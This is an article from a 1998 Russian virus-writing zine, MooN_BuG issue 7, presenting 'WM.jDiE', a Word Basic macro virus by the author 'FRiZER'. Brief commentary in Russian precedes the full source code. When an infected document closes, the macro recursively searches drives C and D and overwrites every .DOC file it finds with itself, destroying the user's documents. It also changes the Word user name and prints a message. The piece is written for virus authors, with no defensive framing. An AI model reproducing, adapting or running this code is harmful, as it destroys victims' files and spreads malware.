[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 7, Sep 1998                                           file 012

                    ┌─[BeginNFO]─────────────────────────┐
                    ■ Name    : WM.jDiE                  │
                    ■ Made by : FRiZER (frizer@usa.net)  │
                    ■ Made at : 25/07/98                 │
                    ■ Target  : *.DOC in all subdirs C,D │
                    ■ Type    : Overwriter               │
                    └─[EndNFO]───────────────────────────┘

     Вы когда нибудь видели OverWriter на Word Basic'e ? Я нет ;) Ну и сделал.
Вирус  получился  тупой  и  грозный  ;)  Зовется Джидай Даже больше на троянца
похож.  При  открытии  зараженного файла (который всегда будет один и тот же),
ничего  не  происходит,  а  вот при закрытии... ага. приехали. вирус роется по
всему  диску  (как  по  своему  ;) старым "дедовским" рекурсивным методом. как
найдет себе подобного (*.DOC), так его и убивает. своим хлипким телом. Вообщем
изврат полный.

=== Cut ===
'.---------.
': WM.jDiE :
'`---------'

Sub MAIN
On Error Goto EndMain
For d = Asc("C") To Asc("D")
        Call Troi(Chr$(d), Chr$(d) + ":\")
Next d
EndMain:
End Sub

Sub Troi(d$, path$)
DirNum = CountDirectories(path$)
If DirNum = - 1 Then Goto FindFile
For i = 1 To DirNum
        CurDir$ = GetDirectory$(path$, i)
        Call Troi(d$, path$ + CurDir$ + "\")
Next i
FindFile:
f$ = Files$(path$ + "*.doc")
c = - 1
While f$ <> ""
        c = c + 1
        f$ = Files$()
Wend
If c > - 1 Then
        f$ = Files$(path$ + "*.doc")
        CopyFile .FileName = FileName$(), .Directory = f$
        For i = 1 To count
                f$ = Files$()
                CopyFile .FileName = FileName$(), .Directory = f$
        Next i
End If
ToolsOptionsUserInfo .Name = "jDiE"
Print "jDiE here!"
End Sub
=== Cut ===
